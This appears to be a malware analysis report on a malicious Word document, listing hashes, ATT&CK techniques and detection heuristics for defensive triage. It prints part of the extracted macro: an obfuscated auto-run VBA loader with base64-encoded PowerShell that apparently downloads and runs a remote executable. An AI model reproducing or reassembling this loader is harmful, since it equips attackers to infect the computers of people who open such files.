Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 b0d544e0aa40d93e…

MALICIOUS

Office (OOXML)

21.0 KB Created: 2021-05-12 09:49:00 UTC Authoring application: Microsoft Office Word 15.0000 First seen: 2021-05-23
MD5: 71d5c20320737fccca5354aeb704b9f9 SHA-1: a706c1164ec0595c8b81c45d42ac029a0071a7b5 SHA-256: b0d544e0aa40d93eaaa07156f61ca7bc65523d6cdb300e490e3b74c5c69e13ac
204 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample contains a VBA project with an auto-executing Document_Open macro. This macro is heavily obfuscated and uses CreateObject to execute a payload. The obfuscated VBA code likely downloads and executes a second-stage payload, indicated by the presence of the 'macros.bas' and 'vbaProject_00.bin' artifacts.

Heuristics 7

  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 6082 bytes
SHA-256: 5a9397ad7324003fcfbb4842aa66ddbe4e5e6e35544d6b01278a6d845511a099
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Document_Open()

egQV.wO8Mq_xsq_72EK_IQqs_


End Sub




Attribute VB_Name = "egQV"
Sub wO8Mq_xsq_72EK_IQqs_()
Dim D3_Qb6 As Range
tW1N_22uvI_sV_ZBnH9_k_5C_XvplNu_CCUYUhS_p = "W#1  ,XlPrObzT\08kGM& w 'B]&_cKQ>'QoHU^JY~ao"
Dim t_OM__9y_DzRVKobmFj___XX_eHiAp_ywNz9ez_Nvzj_4jp1p7rQr As String
bXfJWY = d___fsa(121) & d___fsa(131) & d___fsa(90) & d___fsa(54) & d___fsa(69) & d___fsa(89) & d___fsa(54) & d___fsa(102) & d___fsa(116) & d___fsa(101) & d___fsa(109) & d___fsa(116) & d___fsa(123) & d___fsa(136) & d___fsa(116) & d___fsa(105) & d___fsa(116) & d___fsa(126) & d___fsa(123) & d___fsa(116) & d___fsa(130) & d___fsa(98) & d___fsa(54) & d___fsa(67) & d___fsa(91) & d___fsa(54)
Dim ekg1Ga1PyK_Ad_Uo6wELIKXNcVyP2_8n As Range
qsDQnhZVV_O_4_iVA_5BV = "dT^w ekr "
Dim vICIMtlaWuLR3vMGNHDnyvJ_LiQE42__bj5Z__Pxx48E_iAHLElrqW As String
bXfJWY = bXfJWY & "WwBTAHkAcwBUAGUATQAuAHQAZQBYAHQALgBlAG4AQwBPAEQASQBOAGcAXQA6ADoAdQBuAGkAQwBPAGQAZQAuAGcARQBUAFMAVAByAEkATgBHACgAWwBzAFkAcwB0AGUATQAuAGMATwBuAFYAZQBSAFQAXQA6ADoARgBSAG8ATQBCAGEAcwBFADYANABzAHQAcgBpAE4ARwAoACIAZABBAEIAeQBBAEgAawBBAGUAdwBCAG0AQQBHADgAQQBjAGcAQQBnAEEAQwBnAEEASgBBAEIAcABBAEQAMABBAE0AUQBBADcAQQBDAEEAQQBKAEEAQgBwAEEAQwBBAEEATABRAEIAcwBBAEcAVQBBAEkAQQBBAHgAQQBEAEEAQQBNAEEAQQB3AEEARABBAEEATwB3AEEAZwBBAEMAUQBBAGEAUQBBAHIAQQBDAHMAQQBLAFEAQQBnAEEASABzAEEASgBBAEIAcABBAEMAdwBBAEkAZwBCAGcAQQBHADQAQQBJAGcAQgA5AEEASAAwAEEAWQB3AEIAaABBAEgAUQBBAFkAdwBCAG8AQQBIAHMAQQBmAFEAQQBnAEEARwBZAEEAZABRAEIAdQB"
Dim fA8_6nSVgesJzI1vEE2Oz4w__mh_3nFIK__4a8BkUQMSUrrqQY As Range
WzQfkB35I_Jc2OZ8uE6KG_F4YgT = "'bd:<+n]Q,|G Ds!|vr-  7A'>Jru)  gO6T"
Dim iO4zqSnsS4WRrg_2e_wU_5s6bTDrSiV__rJfNEc_Cf__NwDmD_ktl_O As String
bXfJWY = bXfJWY & "BAEcATQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQQBnAEEASABZAEEAVgB3AEIAagBBAEMAQQBBAEsAQQBBAGcAQQBDAFEAQQBSAFEAQgB0AEEARQA4AEEASQBBAEEAcwBBAEMAQQBBAEoAQQBCAFQAQQBGADgAQQBNAFEAQgAwAEEARABJAEEASQBBAEEAcABBAEEAMABBAEMAZwBCADcAQQBHAGsAQQBUAFEAQgBRAEEARwA4AEEAVQBnAEIAVQBBAEMAMABBAGIAUQBCAHYAQQBFAFEAQQBkAFEAQgBNAEEARwBVAEEASQBBAEIAaQBBAEUAawBBAGQAQQBCAFQAQQBGAFEAQQBjAGcAQgBCAEEARQA0AEEAVQB3AEIAbQBBAEcAVQBBAGMAZwBBADcAQQBBADAAQQBDAGcAQgB6AEEARgBRAEEAWQBRAEIAUwBBAEgAUQBBAEwAUQBCAGkAQQBFAGsAQQBWAEEAQgBUAEEARgBRAEEAVQBnAEIAaABBAEUANABBAFUAdwBCAG0AQQBFAFUAQQBjAGcAQQBnAEEAQwAwAEEAYwB3AEIAdgBBAEgAVQBBAGMAZwBCAEQAQQBHAF"
Dim ne8NME6OsXPM9MVcOfmGXxohoEZc As Range
I8kT3SeAPzF4GFMf7YEOrfKC831zzOi_oS_tv = "|T+I~{'qsGg/zt/~ d$3JC2 o wH1 o\.>5GjH=/{T\of: ' + !K!)YA-h "
Dim TfrVCYPsAGZ_kE9_tlmWV9ao__G_Ex_bs__igLSvwE2jOqnS_chT_NY As String
bXfJWY = bXfJWY & "UAQQBJAEEAQQBrAEEARQBVAEEAYgBRAEIAUABBAEMAQQBBAEwAUQBCAGsAQQBHAFUAQQBjAHcAQgAwAEEARwBrAEEAVABnAEIAQgBBAEgAUQBBAGEAUQBCAFAAQQBFADQAQQBJAEEAQQBrAEEARgBNAEEAWAB3AEEAeABBAEgAUQBBAE0AZwBBADcAQQBDAEEAQQBKAGcAQQBnAEEAQwBRAEEAVQB3AEIAZgBBAEQARQBBAGQAQQBBAHkAQQBEAHMAQQBmAFEAQQBOAEEAQQBvAEEAZABBAEIAeQBBAEgAawBBAGUAdwBBAGsAQQBHAHcAQQBkAEEAQgBmAEEARwA0AEEAUgB3AEEAMwBBAEcAVQBBAGEAZwBBADQAQQBEADAAQQBKAEEAQgBGAEEARwA0AEEAVgBnAEEANgBBAEYAUQBBAFIAUQBCAHQAQQBIAEEAQQBLAHcAQQBuAEEARgB3AEEAVwBnAEIAZgBBAEYAOABBAE4AdwBCAGYAQQBGADgAQQBXAGcAQgB0AEEARgBVAEEAYwBRAEIAVQBBAEcAYwBBAEwAZwBCAGwAQQBIAGcAQQBaAFEAQQBuAEEARABzAEEAR"
Dim T__L_GHdB_8Oj_OcXH1jG_1PRMw8kFpTTajdd9HddkpcPQ_IrA As Range
FnHNBl4xTI26Oc4_Zt8YAL_ePN9AIdEj_dDpHKR2_S_J = "$n`~g* [_v3_G G vRFU!wO& l1+4k&\oI+"
Dim rsCwW4s8_i_4hl7xl4ez_GyuODzDR_UfBuwg_BbNuGiWSI_eNcF_xJF As String
bXfJWY = bXfJWY & "ABRAEEASwBBAEgAWQBBAFYAdwBCAGoAQQBDAEEAQQBKAHcAQgBvAEEASABRAEEAZABBAEIAdwBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBOAHcAQQA1AEEAQwA0AEEATgBBAEEAegBBAEMANABBAE0AUQBBADAAQQBEAEEAQQBMAGcAQQB4AEEARABVAEEATQBBAEEAdgBBAEcAYwBBAGUAZwBCAHoAQQBIAFEAQQBMAHcAQgB3AEEARwA4AEEATQBRAEEAdQBBAEcAVQBBAGUAQQBCAGwAQQBDAGMAQQBJAEEAQQBrAEEARwB3AEEAZABBAEIAZgBBAEcANABBAFIAdwBBADMAQQBHAFUAQQBhAGcAQQA0AEEARABzAEEARABRAEEASw
... (truncated)
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 21504 bytes
SHA-256: 20d5f5e8414fa1774d2f9ee73911d7238ae4b1a5378bac1417179f6e3e037ddc
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 long base64-like blob(s).

Open this report in the interactive analyzer, or submit your own file for analysis.